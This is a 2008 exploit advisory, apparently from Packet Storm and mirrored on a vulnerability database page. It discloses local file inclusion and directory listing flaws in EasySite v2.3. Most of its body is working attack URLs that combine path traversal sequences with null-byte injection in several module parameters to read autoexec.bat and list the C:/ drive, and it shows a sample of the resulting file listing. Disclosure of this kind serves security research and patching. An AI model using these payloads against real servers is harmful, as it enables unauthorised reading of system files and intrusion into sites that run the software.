Lucene search

K

easysite-lfi.txt

🗓️ 22 Aug 2008 00:00:00Reported by SirGodType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 20 Views

EasySite v2.3 Multiple Remote Vulnerabilities discovered by SirGod allows Local File Inclusion and Arbitrary View of Folder Content

Show more
Code
`####################################################################  
[+] EasySite v2.3 Multiple Remote Vulnerabilities   
[+] Discovered By SirGod   
[+] www.mortal-team.org   
[+] Greetz : E.M.I.N.E.M, Ras ,Puscas_marin ,ToxicBlood,MesSiAH,xZu,HrN  
####################################################################  
  
[+] Local File Inclusion  
  
http://localhost/www/index.php?module=Accueil&action=../../../../autoexec.bat%00  
http://localhost/modules/Module/index.php?module=../../../../autoexec.bat%00  
http://localhost/modules/Module/index.php?ss_module=../../../../autoexec.bat%00  
http://localhost/modules/Module/index.php?ss_action=../../../../autoexec.bat%00  
http://localhost/modules/Themes/index.php?ss_action=../../../../autoexec.bat%00  
http://localhost/modules/Themes/index.php?ss_module=../../../../autoexec.bat%00  
http://localhost/modules/Themes/index.php?module=../../../../autoexec.bat%00  
  
And many others...  
  
This will open autoexec.bat  
  
[+] Arbitrary View Folder Contents  
  
You can view the folder contents and the content of files view via LFI.  
  
http://localhost/www/index.php?module=../../../  
  
http://localhost/inc/vmenu.php?module=../../../  
  
This will open C:/ directory and will show all the files from C:/ .  
  
Example :  
  
* BOOTSECT.BAK  
* BcBtRmv.log  
* IO.SYS  
* MSDOS.SYS  
* autoexec.bat  
* bootmgr  
* config.sys  
* grldr  
* hiberfil.sys  
* pagefile.sys  
  
####################################################################  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
22 Aug 2008 00:00Current
7.4High risk
Vulners AI Score7.4
20
.json
Report